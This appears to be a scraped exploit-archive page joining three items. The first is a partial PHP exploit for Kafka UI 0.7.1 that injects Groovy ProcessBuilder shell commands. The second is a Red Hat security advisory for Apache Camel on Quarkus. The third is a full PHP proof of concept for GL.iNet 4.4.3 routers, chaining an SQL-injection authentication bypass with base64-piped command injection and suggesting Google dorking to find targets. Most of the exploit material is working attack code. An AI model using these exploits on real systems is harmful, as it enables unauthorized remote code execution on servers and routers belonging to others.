$this->normalize_uri("/api/clusters/$cluster/topics/$topic/messages");        $response = $this->send_request('POST', $uri, 'application/json', $post_data);        return $response['status_code'] == 200;    }    public function execute_command($cmd) {        $payload = "Process p=new ProcessBuilder(\"sh\",\"-c\",\"$cmd\").redirectErrorStream(true).start()";        $uri = $this->normalize_uri("/api/clusters/{$this->cluster}/topics/{$this->new_topic}/messages");        $params = [            'q' => $payload,            'filterQueryType' => 'GROOVY_SCRIPT',            'attempt' => 2,            'limit' => 100,            'page' => 0,            'seekDirection' => 'FORWARD',            'keySerde' => 'String',            'valueSerde' => 'String',            'seekType' => 'BEGINNING'        ];        return $this->send_request('GET', $uri, 'application/x-www-form-urlencoded', '', $params);    }    public function check() {        if ($this->vuln_version()) {            return "Kafka-ui version: {$this->version} is vulnerable";        }        return "Kafka-ui version is not vulnerable or unknown.";    }    public function exploit() {        $this->cluster = $this->get_cluster();        if (!$this->cluster) {            die("Could not find or connect to an active Kafka cluster.");        }        $this->new_topic = $this->create_topic($this->cluster);        if (!$this->new_topic) {            die("Could not create a new topic.");        }        if (!$this->produce_message($this->cluster, $this->new_topic)) {            die("Failed to trigger Groovy script payload execution.");        }        $this->execute_command('your_command_here'); // Replace with your desired command        if ($this->delete_topic($this->cluster, $this->new_topic)) {            echo "Successfully deleted topic {$this->new_topic}.";        } else {            echo "Could not delete topic {$this->new_topic}. Manual cleanup required.";        }    }    private function send_request($method, $uri, $content_type, $data = '', $params = []) {        // Placeholder for HTTP request logic (curl, file_get_contents, etc.)        // Implement this function with your desired HTTP request library in PHP        return [            'status_code' => 200,            'body' => '{}'        ];    }    private function normalize_uri($path) {        return $this->target . $path;    }    private function random_string($length) {        return bin2hex(random_bytes($length / 2));    }}// Example usage:$exploit = new KafkaUIExploit("http://target.com");echo $exploit->check();$exploit->exploit();Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Kafka UI 0.7.1 Code Injection

Red Hat Security Advisory 2024-7972-03 - An update for Red Hat Build of Apache Camel 4.4 for Quarkus 3.8 update is now available. The purpose of this text-only errata is to inform you about the enhancements that improve your developer experience and ensure the security and stability of your products. Red Hat Product Security has rated this update as having a security impact of Critical. Issues addressed include a code execution vulnerability.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_7972.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Critical: Red Hat Build of Apache Camel 4.4 for Quarkus 3.8 update is now available (RHBQ 3.8.6.SP1)  
Advisory ID:        RHSA-2024:7972-03  
Product:            Red Hat Build of Apache Camel  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:7972  
Issue date:         2024-10-10  
Revision:           03  
CVE Names:          CVE-2024-7254  
====================================================================

Summary: 

An update for Red Hat Build of Apache Camel 4.4 for Quarkus 3.8 update is now available (RHBQ 3.8.6.SP1).  
The purpose of this text-only errata is to inform you about the enhancements that improve your developer experience and ensure the security and stability of your products.  
Red Hat Product Security has rated this update as having a security impact of Critical.

Description:

An update for Red Hat Build of Apache Camel 4.4 for Quarkus 3.8 update is now available (RHBQ 3.8.6.SP1).  
The purpose of this text-only errata is to inform you about the enhancements that improve your developer experience and ensure the security and stability of your products:  
* CVE-2024-47561 org.apache.avro/avro: Schema parsing may trigger Remote Code Execution (RCE)  
* CVE-2024-7254 com.google.protobuf/protobuf-java: StackOverflow vulnerability in Protocol Buffers

Solution:

CVEs:

CVE-2024-7254

References:

https://access.redhat.com/security/updates/classification/#critical  
https://bugzilla.redhat.com/show_bug.cgi?id=2313454  
https://bugzilla.redhat.com/show_bug.cgi?id=2316116

Red Hat Security Advisory 2024-7972-03

GL.iNet version 4.4.3 suffers from authentication bypass and code injection vulnerabilities.

    =============================================================================================================================================| # Title     : GL.iNet network 4.4.3 Code Injection Vulnerability                                                                          || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://www.gl-inet.com/                                                                                                    |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 158 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass GlinetExploit{    private $targetUri;    private $sid;    private $glinet;    public function __construct($targetUri)    {        $this->targetUri = $targetUri;        $this->glinet = [            'model' => null,            'firmware' => null,            'arch' => null        ];    }    private function send_request($method, $uri, $data = null, $headers = [])    {        $ch = curl_init();        $options = [            CURLOPT_URL => $this->targetUri . $uri,            CURLOPT_RETURNTRANSFER => true,            CURLOPT_CUSTOMREQUEST => $method        ];        if ($data) {            $options[CURLOPT_POSTFIELDS] = $data;            $headers[] = 'Content-Type: application/json';        }        curl_setopt_array($ch, $options);        $response = curl_exec($ch);        curl_close($ch);        return $response ? json_decode($response, true) : null;    }    public function check_vuln_version()    {        $postData = json_encode([            'jsonrpc' => '2.0',            'id' => rand(1000, 9999),            'method' => 'call',            'params' => ['', 'ui', 'check_initialized', []]        ]);        $res = $this->send_request('POST', '/rpc', $postData);        if ($res && isset($res['result'])) {            $this->glinet['model'] = $res['result']['model'];            $this->glinet['firmware'] = $res['result']['firmware_version'];        }        // Check for vulnerable models and firmware        switch ($this->glinet['model']) {            case 'sft1200':                $this->glinet['arch'] = 'mipsle';                return version_compare($this->glinet['firmware'], '4.3.6', '==');            case 'ar750':            case 'ar750s':                $this->glinet['arch'] = 'mipsbe';                return version_compare($this->glinet['firmware'], '4.3.7', '==');            // Add more cases as per your requirement        }        return false;    }    public function auth_bypass()    {        if (!empty($this->sid)) {            return $this->sid;        }        $postData = json_encode([            'jsonrpc' => '2.0',            'id' => rand(1000, 9999),            'method' => 'challenge',            'params' => ['username' => 'root']        ]);        $res = $this->send_request('POST', '/rpc', $postData);        if ($res && isset($res['result']['nonce'])) {            $nonce = $res['result']['nonce'];            $username = "roo[^'union selecT char(114,111,111,116)--]:[^:]+:[^:]+";            $pw = '0';            $hash = md5("$username:$pw:$nonce");            $postData = json_encode([                'jsonrpc' => '2.0',                'id' => rand(1000, 9999),                'method' => 'login',                'params' => [                    'username' => $username,                    'hash' => $hash                ]            ]);            $res = $this->send_request('POST', '/rpc', $postData);            if ($res && isset($res['result']['sid'])) {                $this->sid = $res['result']['sid'];                return $this->sid;            }        }        return null;    }    public function execute_command($cmd)    {        $payload = base64_encode($cmd);        $cmd = "echo {$payload}|openssl enc -base64 -d -A|sh";        $postData = json_encode([            'jsonrpc' => '2.0',            'id' => rand(1000, 9999),            'method' => 'call',            'params' => [                $this->sid,                'logread',                'get_system_log',                ['lines' => '', 'module' => "|{$cmd}"]            ]        ]);        return $this->send_request('POST', '/rpc', $postData, ['Admin-Token: ' . $this->sid]);    }    public function check()    {        if ($this->check_vuln_version()) {            return "Vulnerable: {$this->glinet['model']} | {$this->glinet['firmware']} | {$this->glinet['arch']}";        }        return 'Not Vulnerable';    }    public function exploit($command)    {        $this->sid = $this->auth_bypass();        if ($this->sid) {            echo "SID: {$this->sid}\n";            echo "Executing: {$command}\n";            $this->execute_command($command);        } else {            echo "Authentication bypass failed.\n";        }    }}// Usage$exploit = new GlinetExploit('https://target-url');$exploit->exploit('ls');Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Tag

#google